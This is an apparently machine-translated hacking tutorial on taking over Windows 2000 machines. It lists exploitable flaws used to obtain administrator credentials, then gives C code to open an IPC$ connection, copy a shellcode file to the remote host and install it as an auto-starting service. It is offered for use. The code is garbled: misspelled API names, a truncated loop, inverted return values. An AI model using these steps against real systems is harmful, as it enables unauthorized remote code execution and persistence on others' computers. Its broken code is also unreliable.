How to establish an IPC connection? Don't tell me, everyone knows:
NET USE // IP // IPC $ Password / User: User. Here, we should find a way to get the account and password of Administrator's permissions, there are many ways:
(1) stream scanning
(2) Null.printer buffer overflow
(3) MS SQL empty password
⑷unicode vulnerability
⑸ Remote terminal input method vulnerability
⑹IDQ.dll vulnerability
……Too much! I will not say the specific method.
What can I do after getting Windows 2K Administrator permissions? What do you want to do? What is the service, of course, you wrote a service program! How do you see how S? Below to talk from the perspective of programming, the reader must have a certain network programming basis, and some places have not given an error check, some of the code is referring to others. Please refer to MSDN for some functions and structures. In the shortcomings, please refer to yourself, you can communicate with me: Heavyd@cngale.com. Please see below:
1. How to establish an IPC connection, please see the following code:
Bool ConnetIPC (Char * Remotename, Char * User, Char * Password)
{Char TMP [128] = ""
STRCAT (TMP, Remotename);
STRCAT (TMP, "// IPC $");
NetResouce NetResouce;
NetResouce.lpremotename = TMP;
NetResouce.dwtype = resourcetype_any;
NetResouce.lpprovider = NULL;
IF (WnetdConnection2 (& NetResouce, Password, User, Flase) == NO_ERROR)
//establish connection!
Return False;
Else
Return True;
}
Is not it simple? Correct! It's that simple! So, then come!
2, start writing the program to the host!
Bool Sendfile (Char * RemotePathandfile)
{
Handle HRF;
Unsigned char shellcode [] = "Write Code Here, Such AS / X90 / X90";
INT WRITTENSIZE = 0;
INT LENTH = SIZEOF (Shellcode);
HRF = CREATEFILE (RemotePathandfile, Generic_all, file_share_write, null,
Create_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NUL L); // Establish a file
IF (hrf == invalid_handle_values) Return False;
// Write the file process:
For (int i = 0; i if (! Writefile (HRF, & shellcode, 1, & writtensize, null)
Return False;
Printf ("Send file succe! / N");
}
3, it is necessary to succeed, the last step! - Start service!
Steps: a, Start Service Control Manager (SCM) to get an HSCM handle with SCM_HANDLE;
B. CreateService is also a handle of SCM_HANDLE type HSCS; C, startService
D, By the way, Control can control the status of the service
Such as: ControlService (HSCS, Service_Control_Stop, Null);
//Out of service
ControlService (HSCS, Service_Control_pause, null);
//service paused
Please see the following code:
Bool InstallService (Char * Target, Char * ServiceName, Char * filename,)
{
SC_HANDLE HSCM = NULL, HSCS = NULL;
Service_status serviceArstatus;
HSCM = OpenScManager (Target, NULL, SC_MANAGER_ALL_ACCESS);
HSCS = CREATSERVICE (HSCM, // handle
ServiceName, // Service start name
ServiceName, // Display service name
Service_all_access, // Service Access Type
Service_win32_oen_process, // service type
Service_auto_start, // Automatically start service
Service_ERROR_IGNORE, / / ignore error
Filename, // Started file name
Null, // name of loading Ordering Group (Load Group Name)
NULL, / / Tag identifier
NULL, // Correlated group name
NULL, / / Account (current)
NULL); // password (current)
IF (StartServic (HSCS,
ARGC, // parameter number
Argv); // parameter
{
Sleep (30); // Delay, start the service
While (QueryServiceStatus (HSCS, & ServiceStatus)
{
IF (ServiceStatus.dwcurrentState == Service_Start_PENDDING)
Sleep (30);
Else Break;
}
IF (ServiceStatus.dwcurrentState == Service_Running)
Return True;
Else False;
}
}
Ok, finally completed these three steps, you can slowly enjoy your labor results!
Note: The above programs are for reference only. Please write them into a complete program in your own understanding, don't move directly!
